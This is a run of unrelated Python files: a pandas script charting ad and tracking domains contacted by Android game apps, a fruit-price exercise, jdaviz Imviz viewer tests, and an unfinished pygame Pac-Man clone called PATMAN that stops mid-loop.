print(both.head(10))
############################################
# SUMMARY STUFF #
############################################
def compare_ips_to_domains():
cols = ['Package Name', 'Benign Domains', 'Benign IPs', 'Ad Domains', 'Ad IPs', 'Tracking Domains', 'Tracking IPs']
df = p.read_csv('./make_it_stop/Pandas/game_summary.csv', index_col=None, usecols=cols)
def count_domains(domain_string):
if(p.isnull(domain_string)):
count = 0
else:
count = len(domain_string.split(','))
return count
def should_drop(row):
drop = False
a = row['Benign Domain Count'] == 0
b = row['Ad Domain Count'] == 0
c = row['Tracking Domain Count'] == 0
d = row['Benign IPs'] == 0
e = row['Ad IPs'] == 0
f = row['Tracking IPs'] == 0
if(a and b and c and d and e and f):
drop = True
return drop
df['Benign Domain Count'] = list(map(lambda x: count_domains(x), df['Benign Domains']))
df['Ad Domain Count'] = list(map(lambda x: count_domains(x), df['Ad Domains']))
df['Tracking Domain Count'] = list(map(lambda x: count_domains(x), df['Tracking Domains']))
df.drop('Benign Domains', axis=1, inplace=True)
df.drop('Ad Domains', axis=1, inplace=True)
df.drop('Tracking Domains', axis=1, inplace=True)
df['Should Drop'] = df.apply(should_drop, axis=1)
df = df.drop(df[df['Should Drop']].index)
df.drop('Should Drop', axis=1, inplace=True)
df['Package Name'] = list(map(lambda x: clean_package_name(x), df['Package Name']))
df.set_index('Package Name', inplace=True)
df = df[['Benign IPs', 'Benign Domain Count', 'Ad IPs', 'Ad Domain Count', 'Tracking IPs', 'Tracking Domain Count']]
ax = df.plot(kind='bar', stacked=False, figsize=(16, 5), rot=0, width=0.8)
plt.show()
def compare_confirmed_to_suspected():
cols = ['Package Name', 'Suspected Ad IPs', 'Ad IPs', 'Suspected Tracking IPs', 'Tracking IPs']
renamed = ['HTTP Ad IPs', 'HTTPS Ad IPs', 'HTTP Tracking IPs', 'HTTPS Tracking IPs']
df = p.read_csv('./make_it_stop/Pandas/game_summary.csv', index_col=None, usecols=cols)
df['Package Name'] = list(map(lambda x: clean_package_name(x), df['Package Name']))
df.set_index('Package Name', inplace=True)
df = df[cols[1:]]
df.columns = renamed
current_palette = sns.color_palette()
fig, ax = plt.subplots(figsize=(11,7))
df[[renamed[0], renamed[2]]].plot.bar(ax=ax, stacked=True, position=1, width=0.4, color=current_palette[0:2])
df[[renamed[1], renamed[3]]].plot.bar(ax=ax, stacked=True, position=0, width=0.4, color=current_palette[2:4])
plt.title("HTTP versus HTTPS Advertisement and Tracking IPs")
plt.xlabel("Application")
plt.ylabel("Total Number of IPs")
plt.savefig("./graphs/v3/suspected_vs_confirmed_ips.png")
# plt.show()
# for app in all_apps:
# print(app)
# ips_over_time("./make_it_stop/Pandas/" + app + ".apk.xlsx", "HTTPS", app)
# frames_over_time("./make_it_stop/Pandas/" + app + ".apk.xlsx", "HTTPS", app)
# domains_over_time("./make_it_stop/Pandas/" + app + ".apk.xlsx", "HTTPS", app)
# https_vs_http("./make_it_stop/Pandas/" + app + ".apk.xlsx", app)
# if(app not in no_http):
# ips_over_time("./make_it_stop/Pandas/" + app + ".apk.xlsx", "HTTP", app)
# frames_over_time("./make_it_stop/Pandas/" + app + ".apk.xlsx", "HTTP", app)
# domains_over_time("./make_it_stop/Pandas/" + app + ".apk.xlsx", "HTTP", app)
# plt.close('all')
# sum_domain("./make_it_stop/Pandas/" + all_apps[4] + ".apk.xlsx", all_apps[4],
# "ct.pinterest.com")
non_benign_domains("./make_it_stop/Pandas/" + all_apps[4] + ".apk.xlsx", all_apps[4])
# get_all_domains("./make_it_stop/Pandas/" + all_apps[4] + ".apk.xlsx", all_apps[4])
# compare_ips_to_domains()
# compare_confirmed_to_suspected()
# benign_domains("./make_it_stop/Pandas/io.voodoo.paper2.apk.xlsx", "io.voodoo.paper2")
|
fruit = input()
size = input()
set_count = int(input())
pack = 0
price_pack=0
if size == "small":
pack = 2
if fruit == "Watermelon":
price_pack = pack * 56
elif fruit == "Mango":
price_pack = pack * 36.66
elif fruit == "Pineapple":
price_pack = pack * 42.10
elif fruit == "Raspberry":
price_pack = pack * 20
else:
pack = 5
if fruit == "Watermelon":
price_pack = pack * 28.70
elif fruit == "Mango":
price_pack = pack * 19.60
elif fruit == "Pineapple":
price_pack = pack * 24.80
elif fruit == "Raspberry":
price_pack = pack * 15.20
total_price = price_pack * set_count
if 400 <= total_price <= 1000:
total_price *= 0.85
elif total_price >1000:
total_price *= 0.50
print(f'{total_price:.2f} lv.')
|
import os
import asdf
import numpy as np
import pytest
from astropy import units as u
from astropy.coordinates import SkyCoord
from astropy.nddata import NDData
from astropy.table import Table
from astropy.utils.data import get_pkg_data_filename
from astropy.visualization import AsinhStretch, LinearStretch, LogStretch, SqrtStretch
from numpy.testing import assert_allclose
from jdaviz.configs.imviz.tests.utils import BaseImviz_WCS_NoWCS, BaseImviz_WCS_WCS
# TODO: Remove skip when https://github.com/bqplot/bqplot/pull/1397/files#r726500097 is resolved.
@pytest.mark.skip(reason="Cannot test due to async JS callback")
class TestSave(BaseImviz_WCS_NoWCS):
def test_save(self, tmpdir):
filename = os.path.join(tmpdir.strpath, 'myimage')
self.viewer.save(filename)
# This only tests that something saved, not the content.
assert os.path.isfile(f'{filename}.png')
class TestCenterOffset(BaseImviz_WCS_NoWCS):
def test_center_offset_pixel(self):
self.viewer.center_on((0, 1))
assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
self.viewer.state.y_min, self.viewer.state.y_max),
(-5, 5, -4, 6))
self.viewer.offset_by(1 * u.pix, -1 * u.dimensionless_unscaled)
assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
self.viewer.state.y_min, self.viewer.state.y_max),
(-4, 6, -5, 5))
self.viewer.offset_by(1, 0)
assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
self.viewer.state.y_min, self.viewer.state.y_max),
(-3, 7, -5, 5))
# Out-of-bounds centering is now allowed because it is needed
# for dithering use case.
self.viewer.center_on((-1, 99999))
assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
self.viewer.state.y_min, self.viewer.state.y_max),
(-6, 4, 9.99940e+04, 1.00004e+05))
# Sometimes invalid WCS also gives such output, should be no-op
self.viewer.center_on((np.array(np.nan), np.array(np.nan)))
assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
self.viewer.state.y_min, self.viewer.state.y_max),
(-6, 4, 9.99940e+04, 1.00004e+05))
def test_center_offset_sky(self):
# Blink to the one with WCS because the last loaded data is shown.
self.viewer.blink_once()
sky = self.wcs.pixel_to_world(0, 1)
self.viewer.center_on(sky)
assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
self.viewer.state.y_min, self.viewer.state.y_max),
(-5, 5, -4, 6))
dsky = 0.1 * u.arcsec
self.viewer.offset_by(-dsky, dsky)
assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
self.viewer.state.y_min, self.viewer.state.y_max),
(-4.9, 5.1, -3.90000000002971, 6.09999999997029))
# Cannot mix pixel with sky
with pytest.raises(ValueError, match='but dy is of type'):
self.viewer.offset_by(0.1, dsky)
# Cannot pass invalid Quantity
with pytest.raises(u.UnitTypeError):
self.viewer.offset_by(dsky, 1 * u.AA)
with pytest.raises(u.UnitTypeError):
self.viewer.offset_by(1 * u.AA, dsky)
# Blink to the one without WCS
self.viewer.blink_once()
with pytest.raises(AttributeError, match='does not have a valid WCS'):
self.viewer.center_on(sky)
with pytest.raises(AttributeError, match='does not have a valid WCS'):
self.viewer.offset_by(dsky, dsky)
class TestCenter(BaseImviz_WCS_WCS):
def test_center_on_pix(self):
self.imviz.link_data(link_type='wcs', error_on_fail=True)
# This is the second loaded data that is dithered by 1-pix.
self.viewer.center_on((0, 0))
assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
self.viewer.state.y_min, self.viewer.state.y_max),
(-6, 4, -5, 5))
# This is the first data.
self.viewer.blink_once()
self.viewer.center_on((0, 0))
assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
self.viewer.state.y_min, self.viewer.state.y_max),
(-5, 5, -5, 5))
# Centering by sky on second data.
self.viewer.blink_once()
sky = self.wcs_2.pixel_to_world(0, 0)
self.viewer.center_on(sky)
assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
self.viewer.state.y_min, self.viewer.state.y_max),
(-6, 4, -5, 5))
class TestZoom(BaseImviz_WCS_NoWCS):
@pytest.mark.parametrize('val', (0, -0.1, 'foo', [1, 2]))
def test_invalid_zoom_level(self, val):
with pytest.raises(ValueError, match='Unsupported zoom level'):
self.viewer.zoom_level = val
def test_invalid_zoom(self):
with pytest.raises(ValueError, match='zoom only accepts int or float'):
self.viewer.zoom('fit')
def assert_zoom_results(self, zoom_level, x_min, x_max, y_min, y_max, dpix):
assert_allclose(self.viewer.zoom_level, zoom_level)
assert_allclose((self.viewer.state.x_min, self.viewer.state.x_max,
self.viewer.state.y_min, self.viewer.state.y_max),
(x_min + dpix, x_max + dpix,
y_min + dpix, y_max + dpix))
@pytest.mark.parametrize('is_offcenter', (False, True))
def test_zoom(self, is_offcenter):
if is_offcenter:
self.viewer.center_on((0, 0))
dpix = -4.5
else:
self.viewer.center_on((4.5, 4.5))
dpix = 0
self.assert_zoom_results(10, -0.5, 9.5, -0.5, 9.5, dpix)
# NOTE: Not sure why X/Y min/max not exactly the same as aspect ratio 1
self.viewer.zoom_level = 1
self.assert_zoom_results(1, -46, 54, -45.5, 54.5, dpix)
self.viewer.zoom_level = 2
self.assert_zoom_results(2, -21.5, 28.5, -20.5, 29.5, dpix)
self.viewer.zoom(2)
self.assert_zoom_results(4, -9.5, 15.5, -8.0, 17.0, dpix)
self.viewer.zoom(0.5)
self.assert_zoom_results(2, -22.5, 27.5, -20.5, 29.5, dpix)
self.viewer.zoom_level = 0.5
self.assert_zoom_results(0.5, -98, 102, -95.5, 104.5, dpix)
# This fits the whole image on screen, regardless.
# NOTE: But somehow Y min/max auto-adjust does not work properly
# in the unit test when off-center. Works in notebook though.
if not is_offcenter:
self.viewer.zoom_level = 'fit'
self.assert_zoom_results(10, -0.5, 9.5, -0.5, 9.5, 0)
class TestCmapStretchCuts(BaseImviz_WCS_NoWCS):
def test_colormap_options(self):
assert self.viewer.colormap_options == [
'Gray', 'Viridis', 'Plasma', 'Inferno', 'Magma', 'Purple-Blue',
'Yellow-Green-Blue', 'Yellow-Orange-Red', 'Red-Purple', 'Blue-Green',
'Hot', 'Red-Blue', 'Red-Yellow-Blue', 'Purple-Orange', 'Purple-Green',
'Rainbow', 'Seismic',
'Reversed: Gray', 'Reversed: Viridis', 'Reversed: Plasma', 'Reversed: Inferno',
'Reversed: Magma', 'Reversed: Hot', 'Reversed: Rainbow']
def test_invalid_colormap(self):
with pytest.raises(ValueError, match='Invalid colormap'):
self.viewer.set_colormap('foo')
def test_stretch_options(self):
assert self.viewer.stretch_options == ['arcsinh', 'linear', 'log', 'sqrt']
@pytest.mark.parametrize(('vizclass', 'ans'),
[(AsinhStretch, 'arcsinh'),
(LinearStretch, 'linear'),
(LogStretch, 'log'),
(SqrtStretch, 'sqrt')])
def test_stretch_astropy(self, vizclass, ans):
self.viewer.stretch = vizclass
assert self.viewer.stretch == ans
def test_invalid_stretch(self):
class FakeStretch:
pass
with pytest.raises(ValueError, match='Invalid stretch'):
self.viewer.stretch = FakeStretch
with pytest.raises(ValueError, match='Invalid stretch'):
self.viewer.stretch = 'foo'
def test_autocut_options(self):
assert self.viewer.autocut_options == ['minmax', '99.5%', '99%', '95%', '90%']
@pytest.mark.parametrize(('auto_option', 'ans'),
[('minmax', (0, 99)),
('99.5%', (0.2475, 98.7525)),
('99%', (0.495, 98.505)),
('95%', (2.475, 96.525)),
('90%', (4.95, 94.05))])
def test_autocut(self, auto_option, ans):
self.viewer.cuts = auto_option
assert_allclose(self.viewer.cuts, ans)
def test_invalid_autocut(self):
with pytest.raises(ValueError, match='Invalid autocut'):
self.viewer.cuts = 'foo'
@pytest.mark.parametrize('val', [99, (1, ), (1, 2, 3), (1, 'foo')])
def test_invalid_cuts(self, val):
with pytest.raises(ValueError, match='Invalid cut levels'):
self.viewer.cuts = val
def test_cmap_stretch_cuts(self):
# Change colormap, stretch, and cuts on one image
self.viewer.set_colormap('Viridis')
self.viewer.stretch = 'sqrt'
self.viewer.cuts = '95%'
self.viewer.blink_once()
# Change colormap, stretch, and cuts on other image
self.viewer.set_colormap('Red-Yellow-Blue')
self.viewer.stretch = AsinhStretch
self.viewer.cuts = (0, 100)
# Make sure settings stick on both images, second image displayed/changed first above.
assert self.viewer.state.layers[0].cmap.name == 'RdYlBu' # matplotlib name, not Glue
assert self.viewer.state.layers[0].stretch == 'arcsinh'
assert_allclose((self.viewer.state.layers[0].v_min, self.viewer.state.layers[0].v_max),
(0, 100))
assert self.viewer.state.layers[1].cmap.name == 'viridis' # matplotlib name, not Glue
assert self.viewer.state.layers[1].stretch == 'sqrt'
assert_allclose((self.viewer.state.layers[1].v_min, self.viewer.state.layers[1].v_max),
(2.475, 96.525))
# Go back to initial image for other tests.
self.viewer.blink_once()
class TestMarkers(BaseImviz_WCS_NoWCS):
def test_invalid_markers(self):
with pytest.raises(KeyError, match='Invalid attribute'):
self.viewer.marker = {'foo': 'bar', 'alpha': 0.8}
with pytest.raises(ValueError, match='Invalid RGBA argument'):
self.viewer.marker = {'color': 'greenfishbluefish'}
with pytest.raises(ValueError, match='Invalid alpha'):
self.viewer.marker = {'alpha': '1'}
with pytest.raises(ValueError, match='Invalid alpha'):
self.viewer.marker = {'alpha': 42}
with pytest.raises(ValueError, match='Invalid marker size'):
self.viewer.marker = {'markersize': '1'}
with pytest.raises(ValueError, match='Invalid fill'):
self.viewer.marker = {'fill': '1'}
def test_mvp_markers(self):
x_pix = (0, 0)
y_pix = (0, 1)
sky = self.wcs.pixel_to_world(x_pix, y_pix)
tbl = Table({'x': x_pix, 'y': y_pix, 'coord': sky})
self.viewer.add_markers(tbl)
data = self.imviz.app.data_collection[2]
assert data.label == 'default-marker-name'
assert data.style.color in ('red', '#ff0000')
assert data.style.marker == 'o'
assert_allclose(data.style.markersize, 5)
assert_allclose(data.style.alpha, 1)
assert_allclose(data.get_component('x').data, x_pix)
assert_allclose(data.get_component('y').data, y_pix)
assert self.viewer.layers[2].layer.label == data.label
assert self.viewer.layers[2].state.fill is True
# Table with only sky coordinates but no use_skycoord=True
with pytest.raises(KeyError):
self.viewer.add_markers(tbl[('coord', )])
# Cannot use reserved marker name
with pytest.raises(ValueError, match='not allowed'):
self.viewer.add_markers(tbl, use_skycoord=True, marker_name='all')
self.viewer.marker = {'color': (0, 1, 0), 'alpha': 0.8, 'fill': False}
self.viewer.add_markers(tbl, use_skycoord=True, marker_name='my_sky')
data = self.imviz.app.data_collection[3]
assert data.label == 'my_sky'
assert data.style.color in ((0, 1, 0), '#00ff00')
assert data.style.marker == 'o'
assert_allclose(data.style.markersize, 3) # Glue default
assert_allclose(data.style.alpha, 0.8)
assert_allclose(data.get_component('ra').data, sky.ra.deg)
assert_allclose(data.get_component('dec').data, sky.dec.deg)
assert self.viewer.layers[3].layer.label == data.label
assert self.viewer.layers[3].state.fill is False
# Make sure the other marker is not changed.
assert self.imviz.app.data_collection[2].style.color in ('red', '#ff0000')
assert self.viewer.layers[2].state.fill is True
# TODO: How to check imviz.app.data_collection.links is correct?
assert len(self.imviz.app.data_collection.links) == 14
# Just want to make sure nothing crashes. Zooming already testing elsewhere.
# https://github.com/spacetelescope/jdaviz/pull/1971
self.viewer.zoom_level = 'fit'
# Remove markers with default name.
self.viewer.remove_markers()
assert self.imviz.app.data_collection.labels == [
'has_wcs[SCI,1]', 'no_wcs[SCI,1]', 'my_sky']
# Reset markers (runs remove_markers with marker_name set)
self.viewer.reset_markers()
assert self.imviz.app.data_collection.labels == [
'has_wcs[SCI,1]', 'no_wcs[SCI,1]']
assert len(self.imviz.app.data_collection.links) == 10
# NOTE: This changes the state of self.imviz for this test class!
self.imviz.app.data_collection.remove(self.imviz.app.data_collection[0])
with pytest.raises(AttributeError, match='does not have a valid WCS'):
self.viewer.add_markers(tbl, use_skycoord=True, marker_name='my_sky')
self.imviz.app.data_collection.clear()
with pytest.raises(AttributeError, match='does not have a valid WCS'):
self.viewer.add_markers(tbl, use_skycoord=True, marker_name='my_sky')
def test_markers_gwcs_lonlat(imviz_helper):
"""GWCS uses Lon/Lat for ICRS."""
gw_file = get_pkg_data_filename('data/miri_i2d_lonlat_gwcs.asdf')
with asdf.open(gw_file) as af:
gw = af.tree['wcs']
ndd = NDData(np.ones((10, 10), dtype=np.float32), wcs=gw, unit='MJy/sr')
imviz_helper.load_data(ndd, data_label='MIRI_i2d')
assert imviz_helper.app.data_collection[0].label == 'MIRI_i2d[DATA]'
assert imviz_helper.app.data_collection[0].components == [
'Pixel Axis 0 [y]', 'Pixel Axis 1 [x]', 'Lat', 'Lon', 'DATA']
# If you run this interactively, should appear slightly off-center.
calib_cat = Table({'coord': [SkyCoord(80.6609, -69.4524, unit='deg')]})
imviz_helper.default_viewer.add_markers(calib_cat, use_skycoord=True, marker_name='my_sky')
assert imviz_helper.app.data_collection[1].label == 'my_sky'
|
# -*- coding: utf-8 -*-
# @Author: Ben
# @Date: 2017-03-03 22:23:44
# @Last Modified by: Ben
# @Last Modified time: 2018-05-18 23:12:52
# /Library/Frameworks/Python.framework/Versions/3.6/bin/python3.6 PATMAN.py
import os
import pygame
import time
import random
import sys
from math import sqrt
import operator
class Game:
def __init__(self):
self.points = 0
def check(self, player, ghost):
if sqrt((ghost.rect.x - player.rect.x) ** 2 + (ghost.rect.y - player.rect.y) ** 2) <= 10:
return False
return True
class Queue():
def __init__(self, maxsize):
self.queue = []
self.start = 0
self.end = -1
self.maxsize = maxsize
def isEmpty(self):
len = self.end - self.start
if len < 0:
return True
return False
def isFull(self):
len = self.end - self.start
if len+1 == self.maxsize:
return True
return False
def enqueue(self, item):
if self.isFull() == True:
self.dequeue()
self.end += 1
self.queue.insert(self.end, item)
def dequeue(self):
if self.isEmpty() != True:
self.end -= 1
return self.queue.pop(self.start)
else:
return False
class Graph:
def __init__(self, grid, distance):
self.distance = distance
self.nodes = []
x = y = xcount = ycount = 0
for row in grid:
for col in row:
if not col == "W":
self.nodes.append((x, y))
# pygame.draw.rect(screen, (0, 255, 0), frontierdisplay[str((x, y))].rect)
# pygame.display.update()
x += distance
xcount += 1
xcount = 0
y += distance
x = 0
ycount += 1
time.sleep(1)
for node in self.nodes:
pygame.draw.rect(screen, (0, 255, 0), frontierdisplay[str((node[0], node[1]))])
pygame.display.flip()
# time.sleep(0.1)
input()
def neighbours(self, node):
if node not in self.nodes:
return None
directions = [[self.distance, 0], [-self.distance, 0], [0, self.distance], [0, -self.distance]]
neighbours = []
for direction in directions:
neighbour = (node[0] + direction[0], node[1] + direction[1])
if neighbour in self.nodes:
neighbours.append(neighbour)
return neighbours
class Ghost:
def __init__(self, pos):
ghosts.append(self)
self.rect = pygame.Rect(pos[0], pos[1], 20, 20)
self.previouspos = (self.rect.x, self.rect.y)
self.direction = 3
self.corner = None
# self.previouscoordinates = Queue(4)
# self.count = 0
# self.scared = False
# self.scaredCount = 0
# self.previousPath = []
# self.teleporting = False
# self.teleportcoords = []
def move(self, dy, dx):
if dx != 0:
if self.move_single_axis(dx, 0) == False:
return False
if dy != 0:
if self.move_single_axis(0, dy) == False:
return False
self.previouscoordinates.enqueue([self.rect.x, self.rect.y])
if [self.rect.x, self.rect.y] in self.teleportcoords:
if self.teleportcoords.index([self.rect.x, self.rect.y]) == 0:
if self.direction != 3:
self.rect.x = self.teleportcoords[1][0]+200
self.rect.y = self.teleportcoords[1][1]
self.direction = 2
self.teleporting = True
else:
self.teleporting = False
elif self.teleportcoords.index([self.rect.x, self.rect.y]) == 1:
if self.direction != 2:
self.rect.x = self.teleportcoords[0][0]-200
self.rect.y = self.teleportcoords[0][1]
self.direction = 3
self.teleporting = True
else:
self.teleporting = False
return True
def move_single_axis(self, dx, dy):
self.rect.x += dx
self.rect.y += dy
for wall in walls:
if self.rect.colliderect(wall.rect):
if dx > 0:
self.rect.right = wall.rect.left
if dx < 0:
self.rect.left = wall.rect.right
if dy > 0:
self.rect.bottom = wall.rect.top
if dy < 0:
self.rect.top = wall.rect.bottom
return False
return True
def pursue(self, player, landscape, middle):
if player not in middle:
self.corner = None
else:
corners = [(20, 20), (380, 20), (20, 380), (380, 380)]
if self.corner == None or (self.rect.x, self.rect.y) == self.corner:
while True:
self.corner = player = random.choice(corners)
if not (self.rect.x, self.rect.y) == player:
break
else:
player = self.corner
start = (self.rect.x, self.rect.y)
frontier = Queue(float("inf"))
frontier.enqueue(start)
came_from = {}
came_from[start] = None
end = False
r = random.randint(0, 255)
g = random.randint(0, 255)
b = random.randint(0, 255)
while not frontier.isEmpty():
current = frontier.dequeue()
temp = (current[0] + 10, current[1] + 10)
if (player[0]-10 <= temp[0] and player[0]+10 >= temp[0]) and (player[1]-10 <= temp[1] and player[1]+10 >= temp[1]):
end = current
break
neighbours = landscape.neighbours(current)
if neighbours is not None:
for next in neighbours:
if next not in came_from:
frontier.enqueue(next)
came_from[next] = current
# time.sleep(0.01)
# pygame.draw.rect(screen, (r, g, b), frontierdisplay[str(next)].rect)
# pygame.display.flip()
if not end:
return [player]
path = []
i = 0
##Creates Paths##
while end != start:
end = came_from[end]
path.append(end)
return list(reversed(path))
def retreat(self, corner, player, blockeddirections):
if corner == 1:
x = player.rect.x
y = player.rect.y
player.rect.x = 40
player.rect.y = 30
self.direction = self.chase(player, blockeddirections)
player.rect.x = x
player.rect.y = y
if corner == 2:
x = player.rect.x
y = player.rect.y
player.rect.x = 390
player.rect.y = 30
self.direction = self.chase(player, blockeddirections)
player.rect.x = x
player.rect.y = y
if corner == 3:
x = player.rect.x
y = player.rect.y
player.rect.x = 50
player.rect.y = 390
self.direction = self.chase(player, blockeddirections)
player.rect.x = x
player.rect.y = y
if corner == 4:
x = player.rect.x
y = player.rect.y
player.rect.x = 370
player.rect.y = 390
self.direction = self.chase(player, blockeddirections)
player.rect.x = x
player.rect.y = y
class Player:
def __init__(self, size):
self.rect = pygame.Rect(20, 20, size, size)
self.direction = 3
def move(self, dy, dx, teleportcoords):
if dx != 0:
if self.move_single_axis(dx, 0) == False:
return False
if dy != 0:
if self.move_single_axis(0, dy) == False:
return False
if [self.rect.x, self.rect.y] in teleportcoords:
if teleportcoords.index([self.rect.x, self.rect.y]) == 0:
self.rect.x = teleportcoords[1][0]-10
self.rect.y = teleportcoords[1][1]
self.direction = 2
elif teleportcoords.index([self.rect.x, self.rect.y]) == 1:
self.rect.x = teleportcoords[0][0]+10
self.rect.y = teleportcoords[0][1]
# if self.direction == 3:
# self.move_single_axis(0, 10)
self.direction = 3
return True
def move_single_axis(self, dx, dy):
self.rect.x += dx
self.rect.y += dy
for wall in walls:
if self.rect.colliderect(wall.rect):
if dx > 0:
self.rect.right = wall.rect.left
if dx < 0:
self.rect.left = wall.rect.right
if dy > 0:
self.rect.bottom = wall.rect.top
if dy < 0:
self.rect.top = wall.rect.bottom
return False
return True
class Wall:
def __init__(self, pos, frontier=False):
if not frontier:
walls.append(self)
# print(pos)
frontierdisplay[str(pos)] = self
self.rect = pygame.Rect(pos[0], pos[1], 20, 20)
class Point:
def __init__(self, pos):
points.append((pos[0]+10, pos[1]+10))
class PowerPoint:
def __init__(self, pos):
powerpoints.append(pos)
def resource_path(relative):
if hasattr(sys, "_MEIPASS"):
return os.path.join(sys._MEIPASS, relative)
return os.path.join(relative)
def flatten(seq,container=None):
if container is None:
container = []
for s in seq:
if hasattr(s, '__iter__'):
flatten(s, container)
else:
container.append(s)
return container
def pause():
time.sleep(1)
while True:
for e in pygame.event.get():
if e.type == pygame.QUIT:
pygame.display.quit()
pygame.quit()
sys.exit()
running = False
key = pygame.key.get_pressed()
if key[pygame.K_ESCAPE]:
pygame.display.quit()
pygame.quit()
sys.exit()
if key[pygame.K_p]:
return
pygame.init()
pygame.display.set_caption("PATMAN")
global screen
screen = pygame.display.set_mode((420, 420))
global waca
waca = pygame.mixer.Sound("data/Waca.wav")
game = Game()
global walls
walls = []
global points
points = []
global powerpoints
powerpoints = []
global ghosts
ghosts = []
global frontierdisplay
frontierdisplay = {}
size = 20
player = Player(size)
player.rect.x = 20
player.rect.y = 20
level = open(resource_path(os.path.join('data', "MAP.patlayout")))
middle = []
x = y = 0
teleportcoords = []
xcount = ycount = 0
for row in level:
for col in row:
if col == "W":
Wall((x, y))
else:
Wall((x, y), True)
if col == "T":
teleportcoords.append([xcount * 2 * 10, ycount * 2 * 10])
elif col == "P":
Point((x, y))
elif col == "G":
Ghost((x, y))
middle.append((x, y))
middle.append((x-10, y))
middle.append((x, y-10))
middle.append((x-10, y-10))
middle.append((x+10, y))
middle.append((x, y+10))
middle.append((x+10, y+10))
middle.append((x+10, y-10))
middle.append((x-10, y+10))
elif col == "B":
PowerPoint((x, y));
x += 20
xcount += 1
xcount = 0
y += 20
x = 0
ycount += 1
def Main():
pointlength = len(points)
for ghost in ghosts:
ghost.teleportcoords = teleportcoords
teleport_path = [[(-10, 430), (430, 430), (430, 180)], [(430, 430), (-10, 430), (-10, 180)]]
patman_closed = pygame.image.load(resource_path(os.path.join('data', 'patman.png')))
patman_closed = pygame.transform.scale(patman_closed, (size, size))
patman_closed_flipped = pygame.transform.flip(patman_closed, True, False)
patman_open = pygame.image.load(resource_path(os.path.join('data', 'patman_open.png')))
patman_open = pygame.transform.scale(patman_open, (size, size))
patman_open_flipped = pygame.transform.flip(patman_open, True, False)
ghost_image_1 = pygame.image.load(resource_path(os.path.join('data', 'ghost1.png')))
ghost_image_1 = pygame.transform.scale(ghost_image_1, (size, size))
ghost_image_2 = pygame.image.load(resource_path(os.path.join('data', 'ghost2.png')))
ghost_image_2 = pygame.transform.scale(ghost_image_2, (size, size))
ghost_image_3 = pygame.image.load(resource_path(os.path.join('data', 'ghost3.png')))
ghost_image_3 = pygame.transform.scale(ghost_image_3, (size, size))
ghost_image_4 = pygame.image.load(resource_path(os.path.join('data', 'ghost4.png')))
ghost_image_4 = pygame.transform.scale(ghost_image_4, (size, size))
ghost_image_scared = pygame.image.load(resource_path(os.path.join('data', 'ghostscared.png')))
ghost_image_scared = pygame.transform.scale(ghost_image_scared, (size, size))
mouth_open = False
flipped = False
retreat = False
scoreText = pygame.font.SysFont("monospace", 15)
finishText = pygame.font.SysFont("freesansbold.ttf", 60)
x = 1
ghostinc = 0
# time.sleep(1)
sleep = 0.06
gameStart = time.time()
landscape = Graph(open(resource_path(os.path.join('data', "MAP.patlayout"))), 20)
print(" >> Graph created")
running = True
while running:
for ghost in ghosts:
# if ghost.scared == True:
# if game.checkScared(player, ghost):
# game.points += 10
# ghost.scared = False
# ghost.rect.x = 200
# ghost.rect.y = 180
# else:
if game.check(player, ghost) == False:
running = False
for e in pygame.event.get():
if e.type == pygame.QUIT:
pygame.display.quit()
pygame.quit()
sys.exit()
running = False
key = pygame.key.get_pressed()
if key[pygame.K_ESCAPE]:
pygame.display.quit()
pygame.quit()
sys.exit()
running = False
if key[pygame.K_p]:
pause()
time.sleep(1)
if key[pygame.K_UP]:
player.rect.y += -10
for wall in walls:
if player.rect.colliderect(wall.rect):
newplayerdirection = player.direction
break
else:
newplayerdirection = 0
player.direction = newplayerdirection
player.rect.y += +10
if key[pygame.K_DOWN]:
player.rect.y += +10
for wall in walls:
if player.rect.colliderect(wall.rect):
newplayerdirection = player.direction
break
else:
newplayerdirection = 1
player.direction = newplayerdirection
player.rect.y += -10
if key[pygame.K_LEFT]:
player.rect.x += -10
for wall in walls:
if player.rect.colliderect(wall.rect):
newplayerdirection = player.direction
break
else:
newplayerdirection = 2
player.direction = newplayerdirection
player.rect.x += +10
if key[pygame.K_RIGHT]:
player.rect.x += +10
for wall in walls:
if player.rect.colliderect(wall.rect):
newplayerdirection = player.direction
break
else:
newplayerdirection = 3
player.direction = newplayerdirection
player.rect.x += -10
if player.direction == 0:
player.move(-10, 0, teleportcoords)
if player.direction == 1:
player.move(--10, 0, teleportcoords)
if player.direction == 2:
flipped = True
player.move(0, -10, teleportcoords)
if player.direction == 3:
flipped = False
player.move(0, 10, teleportcoords)
occured = []
ghostnum = 1
retreat = False
screen.fill((0, 0, 0))
colours = [(246, 0, 0), (249, 141, 0), (244, 145, 207), (70, 251, 244)]
for ghost in ghosts:
if x > 0 and ghostinc % 2 == 0:
ghost.previouspos = (ghost.rect.x, ghost.rect.y)
next_coord = ghost.pursue((player.rect.x, player.rect.y), landscape, middle)
for coord in next_coord:
try:
pygame.draw.rect(screen, colours[ghosts.index(ghost)], frontierdisplay[str(coord)].rect)
except:
pass
if len(next_coord) > 1:
next_coord = next_coord[1]
elif len(next_coord) == 1:
if not ghost.corner:
next_coord = (player.rect.x, player.rect.y)
else:
next_coord = next_coord[0]
else:
next_coord = (ghost.rect.x, ghost.rect.y)
ghost.rect.x = next_coord[0]
ghost.rect.y = next_coord[1]
ghostnum += 1
for wall in walls:
pygame.draw.rect(screen, (0, 0, 255), wall.rect)
i = 0
for point in points:
if player.rect.x == point[0] - 10 and player.rect.y == point[1] - 10:
point = None
points.pop(i)
game.points += 1
else:
if point[0] == 0 and point[1] == 0:
pygame.draw.circle(screen, (255, 0, 0), point, 3)
else:
pygame.draw.circle(screen, (255, 255, 255), point, 3)
i += 1
i = 0
for powerpoint in powerpoints:
if player.rect.x == powerpoint[0] - 10 and player.rect.y == powerpoint[1] - s10:
powerpoints.pop(i)
else:
pygame.draw.circle(screen, (255, 255, 255), powerpoint, 5)
i += 1
x = 1
for ghost in ghosts:
# if ghost.scared:
# screen.blit(ghost_image_scared, ghost.rect)
# if ghost.scaredCount == 200:
# ghost.scared = False
# ghost.scaredCount = 0
# else:
# ghost.scaredCount += 1
if x == 1:
